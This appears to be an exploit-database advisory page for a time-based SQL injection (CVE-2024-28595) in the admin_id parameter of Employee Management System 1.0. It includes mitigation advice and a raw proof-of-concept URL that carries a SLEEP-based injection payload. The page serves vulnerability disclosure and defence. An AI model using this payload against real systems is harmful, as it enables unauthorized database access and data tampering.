header-logo
Suggest Exploit
vendor:
Employee Management System
by:
Shubham Pandey
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Employee Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2024-28595
CPE: a:employee_management_system:employee_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2024

Employee Management System 1.0 – ‘admin_id’ SQL Injection

SQL Injection vulnerability in Employee Management System version 1.0 allows attackers to execute arbitrary SQL commands through the admin_id parameter in update-admin.php. An attacker can manipulate the admin_id parameter to inject malicious SQL queries, leading to unauthorized access or data manipulation.

Mitigation:

To mitigate this vulnerability, it is recommended to use parameterized queries or prepared statements to sanitize user inputs and prevent SQL injection attacks. Additionally, limiting database privileges and implementing proper input validation can help in preventing such attacks.
Source

Exploit-DB raw data:

# Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi
# Date: 20-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-28595
# Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php.
# POC:
1. Here we go to : http://127.0.0.1/taskmatic/index.php
2. Now login with default Username and Password.
3. Visit the URL:
http://127.0.0.1/taskmatic/update-admin.php?admin_id=3'||(SELECT 0x697a7843
WHERE 5649=5649 AND (SELECT 2097 FROM (SELECT(SLEEP(5)))JzJH))||'
4. Page will load for 5 seconds because of time-based sql injection
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md

Navigation

Suggest Exploit

Services By CQR